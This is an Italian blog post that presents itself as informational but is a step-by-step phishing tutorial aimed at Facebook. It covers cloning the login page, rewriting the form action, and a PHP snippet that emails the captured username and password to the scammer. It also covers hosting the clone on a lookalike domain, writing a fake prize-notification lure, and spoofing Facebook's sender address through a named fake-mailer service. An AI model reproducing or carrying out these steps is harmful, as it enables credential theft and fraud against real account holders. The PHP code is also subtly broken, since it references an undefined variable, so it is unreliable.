Truffare con il Fake Login

Vi è mai capitato di ricevere email  strane e/o sospette di ebay, paypal o altri servizi importanti di e-commerce e pagamenti online ?

Guardate questa email:

Sembra autentica, vero ?

E’ chiaro che è una truffa!

Anche perchè io non sono neanche registrato ad ebay!

Una tecnica diffusissima a cui dovete stare molto attenti è questa:

Si inviano delle fake email ( Che hanno come mittente l’email vera, autentica e ufficiale del servizio per cui ci si vuole spacciare ),

queste fake mail contengono uno “scusante” che ti fanno raggiungere un’indirizzo web dove è riprodotto il sito(Ad esempio Ebay)

esattamente cosi’ com’è e dove c’è un form per loggarsi e l’utente che ci casca inserire i veri username e password, che in realtà vengono

inviati ai truffatori:)

Come fanno i truffatori”?

Per un giorno diventiamo truffatori 🙂

Queste informazioni sono solo per farvi capire e quindi per puro scopo informativo 🙂

Tutto ciò che ci serve è :

– Uno spazio web disponibile

– Un qualsiasi editor html( Meglio se Golive o Dreamweaver)

– Un sito o un programma contenente un servizio di fake mailer.

(Nel nostro caso useremo il mio:

http://www.matteoiammarrone.com/public/modules.php?name=fakemail

)

Fase 1 –  Scegliamo un servizio famoso “Vittima”.

Nel nostro caso scegliamo il famosissimo social network: Facebook

Adesso lo scopo dovrà essere quello di creare una pagina web identica alla pagina web di login di facebook 🙂

Per me che possiedo Adobe Golive è molto semplice, perchè in Adobe Golive è presente una funzione che mi consente di “Scaricare i siti”,

in questo modo: File -> Server -> Download Page, dopodichè inserisco l’indirizzo: http://www.facebook .com e clicco su “Download”.

Adesso modifichiamo l’act del form login di facebook sostituendo nel codice della pagina che abbiamo scaricato:

sostituendo

<form method=”post” action=”http://login.facebook.com/login.php?attempt=0″ name=”menubar_login” id=”menubar_login”>

con

<form method=”post” action=”index.php” name=”menubar_login” id=”menubar_login”>

Ora sviluppiamoci un codice php che ci invii tramite email il contenuto del campo username e password.

Nel caso di facebook, questo codice può andar bene:

<?php

if (isset($_POST[‘pass’])){

$username=$_POST[’email’];

$password=$_POST[‘pass’];

$mail = “miaemail@sadsa.it”; //INSERITE QUI LA VOSTRA EMAIL”

mail($mail, “Nuova vittima!”, “EmailVittima: $username PAssword Vittima: $pass”);

echo “<meta http-equiv=’refresh’ content=’0, url=http://www.facebook.com’/>”;

}
?>

Inserite il codice sovrastante in un punto qualsiasi della pagina che avete scaricato e risalvate la pagina con estensione php.

Adesso  passiamo alla fase 2.

Fase 2 – Connettiamoci via ftp ad un nostro spazio web ( IL massimo sarebbe se è uno spazio web che ha un nome simile a facebook, ad esempio facebook.altervista.org, oppure facebook.net..ecc), una volta connessi all’ftp pubblichiamo il sito “clone” di facebook.

Nel nostro caso lo spazio web sarà: www.matteoiammarrone.com/fbtruffa

Fase 3 – Costruiamo l’email.

Nel nostro caso dobbiamo prendere come modello le vere email inviate dal vero facebook.

Siamo fortunati, visto che le email di facebook sono semplici testi e sostanzialmente non usano html, loghi o simboli particolari.

La nostra email avrà questo “testo piatto”:

Sei uno dei 100.000 utenti selezionati in tutta facebook per tentare di vincere il premio: Utente dell'anno!
Per confermare la tua identità effettua il login a facebook dal link sottostante:
http://www.matteoiammarrone.com/fbtruffa
Grazie,
il team di facebook.
------------
Vuoi specificare quali e-mail ricevere da Facebook? Accedi a:
http://www.facebook.com/editaccount.php?notifications&md=ZXZlbnRfdXBkYXRlO2Zyb209MTU3MDk4MDU1Njt0bz0xNjAyMjc5OTk2">http://www.facebook.com/editaccount.php?notifications&md=ZXZlbnRfdXBkYXRlO2Zyb209MTU3MDk4MDU1Njt0bz0xNjAyMjc5OTk2
Adesso inviamo il messaggio sovrastante usando questo fake email:
http://www.matteoiammarrone.com/public/modules.php?name=fakemail
Come email vittima inserita l'email di una persona di cui sapete della sua presenza su facebook, come email mittente inserite: noreply@facebookmail.com
:):)
Dopodichè inviate l'email e il giochino e' fatto!
 :)

Un articolo a caso

Leave a Reply